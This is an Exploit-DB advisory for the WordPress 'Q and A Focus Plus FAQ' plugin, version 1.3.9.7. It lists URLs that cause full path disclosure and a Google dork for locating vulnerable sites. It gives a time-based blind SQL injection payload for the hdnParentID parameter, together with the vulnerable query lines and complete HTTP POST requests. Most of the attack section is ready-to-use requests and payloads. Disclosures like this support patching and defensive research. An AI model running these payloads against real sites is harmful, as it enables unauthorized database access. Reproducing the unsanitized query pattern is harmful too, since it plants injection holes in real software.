WordPress Plugin Q and A (Focus Plus) FAQ 1.3.9.7 - Multiple Vulnerabilities

EDB-ID:

39806

CVE:

N/A

EDB Verified:

Author:

Gwendal Le Coguic

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2016-05-12

Vulnerable App: 
# Exploit Title: WordPress Q and A (Focus Plus) FAQ Full Path Disclosure and SQL Injection
# Google Dork: inurl:"wp-content/plugins/q-and-a"
# Date: 12-05-2016
# Software Link: https://wordpress.org/plugins/q-and-a-focus-plus-faq/
# Version: 1.3.9.7 and prior
# Exploit Author: Gwendal Le Coguic
# Website: http://10degres.net
# Category: webapps


Create a powerful and easy to use FAQ & knowledge base on your WordPress site.
A powerful and easy to use full-featured FAQ with comments, tags and ratings for your WordPress site.

The plugin was originally named "Q and A FAQ" and developped by Raygun company 
then it has been involved and renamed to "Q and A Focus Plus FAQ" by Lanexatek Creations.


##### Full Path Disclosure #####

http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/q-and-a-focus-plus.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/q-a-focus-plus-admin.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/documentation.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/custom-post.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/functions.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/ratings.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/reorder.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/shortcodes.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/upgrader.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/widgets.php


##### SQL Injection #####

Those vulnerabilities are mitigated by the fact that you have to be connected as an admin to exploit them.

Paramater hdnParentID is vulnerable in two places.
Payload: 0 AND (SELECT * FROM (SELECT(SLEEP(5)))zeCb)

1/ line 46: $parentsParent = $wpdb->get_row("SELECT post_parent FROM $wpdb->posts WHERE ID = " . $_POST['hdnParentID']...

POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
Host: [target]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 165

btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&btnReturnParent=Return+to+parent+page&hdnParentID=0


2/ line 254: $wpdb->get_results("SELECT * FROM $wpdb->posts WHERE post_parent = $parentID and ...

POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
Host: [target]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&hdnParentID=0


##### References #####

https://www.owasp.org/index.php/Full_Path_Disclosure
https://www.owasp.org/index.php/SQL_Injection
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services